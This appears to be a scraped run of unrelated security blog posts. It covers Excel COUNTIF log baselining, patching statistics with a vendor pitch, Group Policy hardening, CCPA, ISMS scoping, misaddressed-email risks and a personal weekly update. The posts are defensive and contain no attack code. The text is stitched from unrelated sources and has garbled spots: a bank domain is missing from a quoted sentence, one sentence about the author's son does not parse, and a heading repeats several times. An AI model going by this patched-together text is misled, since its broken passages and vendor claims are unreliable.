Pro Tip: Be sure to account for log data spanning over changes in UTC offset due to regional events such as daylight savings or summer seasons. For example, local time zone adjustments will need to change for logs in United States Eastern Time from Virginia, USA from +TIME(5,0,0) to +TIME(4,0,0) the first weekend in March every year and back from +TIME(4,0,0) to +TIME(5,0,0) the first weekend in November to account for daylight and standard shifts.

CountIf for Log Baselining

When reviewing logs that record authentication in the form of a user account and timestamp, we can use COUNTIF to establish simple baselines to identify those user accounts with inconsistent activity.  

In the example of user logons that follows, we'll use the formula "=COUNTIF($B$2:$B$25,B2)" to establish a historical baseline. Here is a breakdown of the parameters for this COUNTIF formula located in C2 in our example: 

    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B$25 
    • This is the entire range of all cells, B2 through B25, that we want to use as a range to search for a specific value. Note the use of "$" to ensure that the start and end of the range are an absolute reference and are not automatically updated by Excel if we copy this formula to other cells. 
  • B2 
    • This is the cell that contains the value we want to search for and count occurrences of in our range of $B$2:$B$25. Note that this parameter is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data and count how many times the user of each logon has logged on in total across all data points. 

When most user accounts log on regularly, a compromised account being used to logon for the first time may clearly stand out when reviewing total log on counts. If we have a specific time frame in mind, it may be helpful to know which accounts first logged on during that time.  

The COUNTIF formula can help track accounts through time to identify their first log on which can help identify rarely used credentials that were abused for a limited time frame.  

We'll start with the formula "=COUNTIF($B$2:$B2,B2)" in cell D3. Here is a breakdown of the parameters  for this COUNTIF formula. Note that the use of "$" for absolute referencing is slightly different for the range used, and that is an importance nuance: 

    • This Excel formula counts how many times a value exists in a range of cells. 
  • $B$2:$B2 
    • This is the range of cells, B2 through B2, that we want to start with. Since we want to increase our range as we go through the rows of the log data, the ending cell row number (2 in this example) is not made absolute. As we fill this formula down through the rest of our log data, it will automatically expand the range to include the current log record and all previous logs. 
  • B2 
    • This cell contains the value we want to search for and provides a count of occurrences found in our defined range. Note that this parameter B2 is not an absolute reference with a preceding "$". This allows us to fill the formula down through all rows and ensure that we are counting the applicable user name. 

To summarize, this formula will search the username column of all logon data before and including the current log and count how many times the user of each logon has logged on up to that point in time. 

The following example illustrates how Excel automatically updated the range for D15 to $B$2:$B15 using the fill handle.  

To help visualize a large data set, let's add color scale conditional formatting to each row individually. To do so: 

  1. Select only the cells we want to compare with the color scale (such as D2 to D25). 
  2. On the Home menu, click the Conditional Formatting button in the Styles area. 
  3. Click Color Scales. 
  4. Click the type of color scale we would like to use. 

The following examples set the lowest values to red and the highest values to green. We can see how: 

  • Users with lower authentication counts contrast against users with more authentications. 
  • The first authentication times of users stand out in red. 

Whichever colors are used, be careful not to assume that one color, such as green, implies safety and another color, such as red, implies maliciousness.


The techniques described in this post are just a few ways to utilize Excel to perform analysis on arbitrary data. While these techniques may not leverage some of the more powerful features of Excel, as with any variety of skill set, mastering the fundamentals enables us to perform at a higher level. Employing fundamental Excel analysis techniques can empower an investigator to work through analysis of any presented data type as efficiently as possible.

Software Patching Statistics for 2019: Common Practices and Vulnerabilities

Wondering about software patching statistics and what the current state of affairs on updates is? This is where you will find all the relevant data as soon as experts reveal it, as well as stats based on our own customer data.

I will keep updating this list of software patching statistics periodically so it’s easier to see both the necessity of patching and how well companies worldwide do it (or not).

Without a question, difficulties and delays in applying software patching are still one of the biggest threats for companies today. Apps and software lacking the latest update are some of the easiest targets for any hacker who wants to infiltrate an organization.

Experts keep saying it over and over, but people have a hard time getting to those never-ending software updates. It’s both a matter of prioritization and a matter of difficulty (in the absence of a tool which can successfully automate software patching).

So, here are the most important truths about updates and how we apply them or not. I have broken down the software patching statistics of recent years in sections pertaining to the behavior or phenomena

Why Software Patching is Important, in Statistics and Data:

  • 80% of companies who had a data breach or a failed audit could have prevented it by patching on time or doing configuration updates – Voke Media survey, 2016.
  • Upon a breach or failed audit, nearly half of companies (46%) took longer than 10 days to remedy the situation and apply patches, because deploying updates in the entire organization can be difficult – Voke Media survey, 2016.
  • Devastating malware and ransomware which could have been prevented by patching software on time: WannaCry, NotPetya, SamSam.
  • 20% of all vulnerabilities caused by unpatched software are classified as High Risk or Critical – Edgescan Stats Report, 2018.
  • The average time for organizations to close a discovered vulnerability (caused by unpatched software and apps) is 67 daysEdgescan Stats Report, 2018.
  • 18% of all network-level vulnerabilities are caused by unpatched applications – Apache, Cisco, Microsoft, WordPress, BSD, PHP, etc. – Edgescan Stats Report, 2018.
  • 37% of organizations admitted that they don’t even scan for vulnerabilities – Ponemon Report, 2018.
  • 58% of organizations run on ‘legacy systems’ – platforms which are no longer supported with patches but which would still be too expensive to replace in the near future – 0patch Survey Report, 2017.
  • 64% of organizations say that they plan to hire more people on the vulnerability response team, although the average headcount is already 28, representing about 29% of all security human resources – Ponemon State of Vulnerability Report, 2018.
  • Still, this is something known in the industry as the ‘patching paradox’ – hiring more people will not make software vulnerabilities easier to handle – Ponemon State of Vulnerability Report, 2018.
  • Microsoft reports that most of its customers are breached via vulnerabilities that had patches released years agoMicrosoft’s Security Intelligence Report, 2015.
  • Since 2002, the total number of software vulnerabilities has grown year by year by the thousands. The peak year seems to have been 2018 for now, but the figures keep rising – ENISA report for 2018.

Why Is Software Patching So Difficult?

The main reason why patching is difficult is that manual updates (or coordinating the updates manually) take a gruesome amount of time.

According to the Ponemon Institute study for 2018:

  • More than half of all companies (55%) say that when it comes to spending more time manually navigating the various processes involved than actually patching vulnerabilities;
  • On average it takes 12 days for teams to coordinate for applying a patch across all devices;
  • Most companies (61%) feel that they are disadvantages for relying on manual processes for applying software patches;
  • Nearly two-thirds of all companies (65%) say that it is currently too difficult for them to decide correctly on the priority level of each software patch (aka which update is of critical importance and should be applied first).

Considering that it doesn’t make sense for most organizations to have really well-trained security experts on their payroll, it makes sense to have difficulties when prioritizing patches. In the best scenario, security and IT professionals define priorities simply by following the CVSS scoring.

While that scoring for patch importance is reliable, the organizations which implement automation of software patches are still better off both in terms of security and time spent.

Why Do Companies Choose to Delay Applying Software Patches and Updates?

It’s not just that it’s difficult. Some managers don’t want to apply the patches.

Organizations are not just late in applying patches because it takes time; some managers are reluctant to apply the patches for other reasons. According to the 0patch Survey Report, 2017:

  • 88% say they would apply patches faster if they had the option to quickly un-patch if needed;
  • 79% say decoupling security patches from functional ones would help them apply security patches faster;
  • 72% of managers are afraid to apply security patches right away because they could ‘break stuff’;
  • 52% of managers say they don’t want the functionality changes which come with security patching.

Even more worrying is that not everyone is aware of how dangerous it can be to delay. One of the most baffling software patching statistics of the past year comes from the Ponemon Institute report for 2019, again. According to them, only 39% of organizations are aware that actual breaches are linked to known vulnerabilities.

Of course, not wanting the hassle of updating software or system is a legitimate attitude, albeit a very dangerous one. But it’s only a hassle if you plan on updating it alone, manually.

Our Own Software Patching Statistics:

We have hundreds of thousands of enterprise endpoints which are kept secure and up to date through our patch management automation solution, X-Ploit Resilience. While our fast response and implementation times allow us to keep them all updated at a much higher rate compared to industry benchmarks, there are still interesting insights to be gleaned from our data.

This is what we can boast:

  • A new patch reaches the endpoints secured with our patch management system within 4 hours since it was launched (if the endpoint is available to receive it);
  • By automatically applying the patches, the X-Ploit Resilience technology effectively closes all possible system vulnerabilities in an enterprise environment, effectively taking away about 85% of all possible attack vectors;
  • At the moment, the X-Ploit Resilience patch management system covers 112 of the most common software and apps, with several apps and software being added to the list every year.

And this is what we and our customers need to work on together for an even better performance:

  • During the last 3 months, our corporate customers took a while to apply the patches we made available through our system (this can be either for a lack of activity on the endpoints, or a conscious decision to delay), but still at a rate 4 times faster than the global average).

Wrapping up:

If there’s one thing that the latest software patching statistics reflect, it’s that the field can be very non-homogenous. Some organizations react fast(er) to patches but take a long time applying them or apply them in the incorrect order.  Others have complicated assigning procedures but once a patch is set to be applied, it goes fast and smooth. Some apply only critical system updates and completely reject other patches to avoid functionality changes, even if it puts them at some risk.

The bottom line is that whatever is your organization’s unique flavor, we know patches can be overwhelming in one way or another. That’s why we leverage the scaling power of technology to help keep our customers covered with all software patches and zero inconveniences.

Our X-Ploit Resilience module will handle all software updates and patches within 4 hours since their launch, silently, in the background, with no interruptions. You can set it and forget it, as we like to say, or set a few preferences (like the right to exclude updates from one app or category, or to be asked before applying a patch on all endpoints within your organization, or the possibility to deploy and patch your own custom software through the platform).

The post Software Patching Statistics for 2019: Common Practices and Vulnerabilities appeared first on Heimdal Security Blog.

Webcast: Group Policies That Kill Kill Chains

On this webcast, we’ll guide you through an iterative process of building and deploying effective and practical Group Policy Objects (GPOs) that increase security posture. Download slides: 0:45 Introducing what a kill chain is and general background you need for this webcast 15:53 Getting into group policies, best practices, group policies that we’re not covering […]

The post Webcast: Group Policies That Kill Kill Chains appeared first on Black Hills Information Security.

IDG Contributor Network: What is the California Consumer Privacy Act of 2018? Influencers in the know break down the details

It was only a matter of time before US created their own version of the EU’S General Data Protection Regulation (GDPR). However, unlike the EU who addresses digital privacy protection on a national level, the US is handling online privacy on the state level. California has led the charge with the California Consumer Privacy Act (CCPA) that was passed into law in 2018.

3 main takeaways from the California Consumer Privacy Act of 2018

CCPA is designed with consumers in mind and gives California residents some of the strongest online privacy protections in the country. Here are three main takeaways of the California Consumer Privacy Act of 2018:

To read this article in full, please click here

How to document the scope of your ISMS

If you’re planning to implement an ISMS (information security management system), you’ll need to document the scope of your project – or, in other words, define what information needs to be protected.

There will almost certainly be more information and more locations where information is kept than you initially think of, so it’s essential that you take the time to scope your organisation. However, this involves more than simply identifying the data stored on your systems.

Benefits of defining the scope of your ISMS

Organisations that define the scope of their ISMS will have a much better understanding of their information security environment – where their data resides, where their data is safe, what format the data is held in, and so on.

Knowing this helps you complete information security audits, particularly when it comes to understand how to approach specific risks and which controls are most suitable.

Similarly, by defining the scope of their ISMS, organisations also define what’s out of scope. Having a firm grasp of what doesn’t need to be addressed provides assurances that key parts of the business aren’t being overlooked.

For example, you might identify a third-party data processor that collects information on your behalf – like a payroll service.

You will probably have a contractual agreement with the third-party outlining mandatory information security controls, but you have no control over how these are operated, so you can’t consider it within your scope.

You should instead document the organisation and its processing under Annex A control A.15 – supplier relationships.

Defining your scope

There are three steps to defining the scope of your ISMS. First, you need to identify every location where information is stored.

This includes physical and digital files, the latter of which might be kept locally or in the Cloud.

Second, you need to identify the ways in which information can be accessed. Any entry point, be it a drawer full of files or an employee’s work-issued laptop, should be noted.

Third, you need to determine what is out of scope. These are elements that your organisation either has no control over (such as third-party products) or that don’t give access to or house sensitive information.

For example, your organisation’s foyer probably won’t need security controls. If for some reason you do keep sensitive information there, it would be worth relocating it to put the foyer out of scope.

A well-defined scope ensures that every area of your organisation receives adequate attention when it comes to implementing security controls.

Documenting your scope is also a requirement of ISO 27001, the international standard that describes best practices for an ISMS.

What should the ISO 27001 scoping document look like?

Organisations often get tripped up by how to document the scope of their ISMS, either guessing or spending an inordinate amount of time researching how much detail to go into and the best way to lay out the information.

However, you can avoid that hassle by using our ISO 27001 ISMS Documentation Toolkit.

Developed by expert ISO 27001 practitioners and enhanced by more than ten years of customer feedback and continual improvement, it contains a customisable scope statement as well as templates for every document you need to implement an effective ISMS and comply with the Standard.

Our customisable scope statement takes the hassle out of documenting ISO 27001 compliance.

Our customisable scope statement takes the hassle out of documenting ISO 27001 compliance.

The toolkit contains:

  • A complete set of easy-to-use, customisable and fully ISO 27001-compliant documentation templates that will save you time and money;
  • Easy-to-use dashboards and gap analysis tools to ensure complete coverage of the Standard; and
  • Direction and guidance from expert ISO 27001 practitioners.

Find out more

A version of this blog was originally published on 24 May 2018.

The post How to document the scope of your ISMS appeared first on IT Governance UK Blog.

Three Consequences of a Misaddressed Email

Article by Andrea Babbs, UK General Manager, VIPRE SafeSend

With the number and sophistication of cyber attacks increasing significantly, organisations have had to become aware and adapt to new and evolving digital threats. Yet, many would still consider the simple error of sending an email to the wrong contact trivial, at most embarrassing, but not of concern when it comes to data security. However, misaddressed emails have far-reaching consequences that can seriously impact an organisation, especially in highly regulated industries such as healthcare and finance. From fines to data breaches, what are the potential ramifications of sending an email to the wrong address?

Reputational and Financial Damage

While accidentally dialling a wrong number can be a little embarrassing, the same cannot be said for sending an email to the wrong contact. You could try to correct the error with a follow-up email to apologise and request that the recipient delete the message, but even if you’ve spotted the error it’s often too late. Moreover, the misuse of CC and BCC functions could expose your entire contact database, potentially giving your competitors an opportunity to lure your customers or employees away, or worse – exposing customer emails to potential hackers.

BitMEX, one of the world’s largest cryptocurrency trading platforms accidentally leaked thousands of private customer email addresses when they sent out a mass mailshot without using the BCC function. While the company maintains that customer privacy remains a top priority, its customers were left wondering how they could trust BitMEX with huge personal assets in the aftermath of this data protection failure.

A similar incident in 2018 led to the Independent Inquiry into Child Sexual Abuse (IICSA) being fined £200,000 by the Information Commissioner’s Office (ICO) for failing to protect the identity of possible victims of child abuse after a human error accidentally exposed victim identities to third parties, when they included their email addresses in the ‘To’ rather than ‘BCC’ field. In the age of increased data protection regulations, this example demonstrates just how seriously the ICO takes these types of data breaches. The pain of embarrassment from sending an email to the wrong contact pales in comparison to the business pain from financial penalties.

Intellectual Property Loss
Should confidential corporate information fall into the wrong hands, the consequences could be devastating. Crucial company information such as trade secrets or blueprints of an unpatented new product leaking into the public domain could easily be intercepted by the competition, resulting in a lost competitive advantage.

All it takes is a simple missed or added character in the email address, autocorrect taking over, or simply pressing send too soon and the information that was once confidential is sitting in the wrong inbox. It could be that of an unknown individual, competitor, or even a cyber-criminal.

In 2018, Commonwealth Bank staff inadvertently sent 651 emails to an overseas company as they forgot to include ‘.au’ at the end of the domain that should have read ‘’. This data leak occurred over a long period without anyone noticing, so could have potentially exposed sensitive company data or private customer information to competitors, putting the company at serious risk. However, luckily on this occasion, the company confirmed that no customer data had been compromised.

Data Breach
The ICO found that misaddressed emails are the largest source of data loss for organisations – over 269 billion emails are sent around the world each day. Gone are the days when employees operated from a single office-based computer, the modern workforce is now working from potentially several locations across a number of devices. Combine this with increasing pressures on staff juggling deadlines and deliverables to perform better and faster, it’s no surprise that most don’t spend time verifying the accuracy of the email address they are about to send confidential information to – no organisation is immune to human error.

Hackers can capitalise on this complacent email culture by cleverly disguising emails to look like they are coming from inside the company, but actually, have a similar spoofed domain name that the employee would probably fail to spot on a first glance. Potentially opening the organisation up to a devastating hacking, malware or ransomware attack and a clear reason why Business Email Compromise (BEC) scams continue to be popular with cybercriminals.


The ramifications of misaddressed emails go far beyond just an embarrassing mishap – the threat that comes from accidental data leakage can be just as damaging as the external threat of cybercrime, especially as these leaks often go unnoticed for a period of time. Businesses need a clear strategy to address the issue of misaddressed emails and mitigate the associated risks to remain compliant and secure. What is required is a tool that prompts users for a double-check of their email based on set parameters, who it is being sent to, the contents and attachments. But this isn’t about adding time or delay to employees that are already under pressure – it’s about increasing awareness and improving email culture where mistakes can so easily be made.

Weekly Update 167

Weekly Update 167

It's summer! Yes, I know it's back to front for many of you but Dec 1 means it's sunnier than ever here. Regardless, this week I've been at DDD in Brisbane, written my 10 year old son Ari and I running kids coding clubs in Oslo (cold) and London (rainy) next month and the Swiss gov being on-boarded onto HIBP. Plus there's this week's sponsor IVPN and how tracking ain't tracking (that may be a bit of an old Aussieism). Next week I'll come to you from the YOW! conference somewhere else within the country.

Weekly Update 167
Weekly Update 167
Weekly Update 167
Weekly Update 167


  1. I'll be keynoting at YOW! Sydney, Brisbane and Melbourne over the coming couple of weeks (happy to be back there after a few years hiatus)
  2. Come and join Ari and I teaching kids to code in Oslo and London next month (it's free, just bring a kid and a laptop)
  3. The Swiss gov is now on HIBP! (that makes 7, I'd love intros to more govs)
  4. Sponsored by IVPN. This ad is not tracking you, but most others do. Fight digital surveillance by blocking ads and web trackers on all your devices. (and no, they're not "tracking you" when you click that link!)